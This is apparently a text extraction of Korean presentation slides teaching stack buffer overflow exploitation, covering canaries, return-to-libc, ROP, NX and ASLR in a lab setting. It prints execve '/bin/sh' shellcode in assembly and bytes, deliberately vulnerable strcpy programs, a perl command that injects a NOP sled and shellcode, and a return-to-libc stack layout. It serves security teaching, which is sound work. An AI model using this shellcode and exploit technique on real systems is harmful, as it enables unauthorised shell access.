whoami System http symnoisy tistory com www facebook

whoami • System • http: //symnoisy. tistory. com • www. facebook. com/jungbin. yu

0 x 02 흐름(원리)을(를) 알아라 • Canary • BOF • RTL • ROP • DEP/NX • ASCII Armor • ASLR

0 x 03 시도해라 레지스터? EAX EBP EBX ESP EIP ECX ESI EDX EDI

0 x 03 시도해라 쉘코드? [gate@localhost it 4 u]$ cat sh. s. global main: xor %eax, %eax push $0 x 68732 f 2 f push $0 x 6 e 69622 f mov %esp, %ebx xor %ecx, %ecx push %ebx mov %esp, %ecx xor %edx, %edx movb $0 x 0 b, %al int $0 x 80

0 x 03 시도해라 쉘코드? 08048398 <main>: 8048398: 31 c 0 804839 a: 50 804839 b: 68 2 f 2 f 73 68 80483 a 0: 68 2 f 62 69 6 e 80483 a 5: 89 e 3 80483 a 7: 31 c 9 80483 a 9: 51 80483 aa: 53 80483 ab: 89 e 1 80483 ad: 31 d 2 80483 af: b 0 0 b 80483 b 1: cd 80 80483 b 3: 90 80483 b 4: 90 80483 b 5: 90 xor push mov xor push mov xor mov int nop nop %eax, %eax $0 x 68732 f 2 f $0 x 6 e 69622 f %esp, %ebx %ecx, %ecx %ebx %esp, %ecx %edx, %edx $0 xb, %al $0 x 80

0 x 03 시도해라 [소스] [gate@localhost it 4 u]$ cat vul. c #include <stdio. h> int main(int argc, char **argv){ char buffer[256]; strcpy(buffer, argv[1]); puts(buffer); } Buf[256] SFP RET

0 x 03 시도해라 [TIP] int main(int argc, char *argv[]) EX). /test `perl –e ‘print “ABCD”’` `perl –e ‘print “EFGH”’` Argc: 3 Argv: [0], [1], [2]

0 x 80483 f 8 <main>: 0 x 80483 f 9 <main+1>: 0 x 80483 fb <main+3>: 0 x 8048401 <main+9>: 0 x 8048404 <main+12>: 0 x 8048407 <main+15>: 0 x 8048409 <main+17>: 0 x 804840 a <main+18>: 0 x 8048410 <main+24>: 0 x 8048411 <main+25>: 0 x 8048416 <main+30>: 0 x 8048419 <main+33>: 0 x 804841 f <main+39>: 0 x 8048420 <main+40>: 0 x 8048425 <main+45>: 0 x 8048428 <main+48>: 0 x 8048429 <main+49>: push %ebp mov %esp, %ebp sub $0 x 100, %esp mov 0 xc(%ebp), %eax add $0 x 4, %eax Buf[256] mov (%eax), %edx SFP push %edx lea 0 xffffff 00(%ebp), %eax push %eax call 0 x 804833 c <strcpy> RET add $0 x 8, %esp lea 0 xffffff 00(%ebp), %eax push %eax call 0 x 804830 c <puts> add $0 x 4, %esp leave ret

0 x 03 시도해라 | NOP +SHELLCODE | SFP | &buf |

0 x 03 시도해라 [gate@localhost it 4 u]$. /vul `perl -e 'print "x 90"x 156, "x 31xc 0x 50x 68x 2 fx 7 3x 68x 2 fx 62x 69x 6 ex 89xe 3x 5 0x 53x 89xe 1x 99xb 0x 0 bxcdx 80", " x 90"x 76, "SFPS", "RETS"'`

0 x 03 시도해라 if(argv[1][47] == 'xbf') { printf("stack betrayed you!!n"); exit(0); } #include <stdio. h> #include <stdlib. h> main(int argc, char *argv[]) { char buffer[40]; int i; if(argc < 2){ printf("argv errorn"); exit(0); } strcpy(buffer, argv[1]); printf("%sn", buffer); }

0 x 03 시도해라 | buf | SFP | &system | &exit | &/bin/sh|

Thank you ! Q&A +)컨퍼런스에 많이 가보세요 ! http: //symnoisy. tistory. com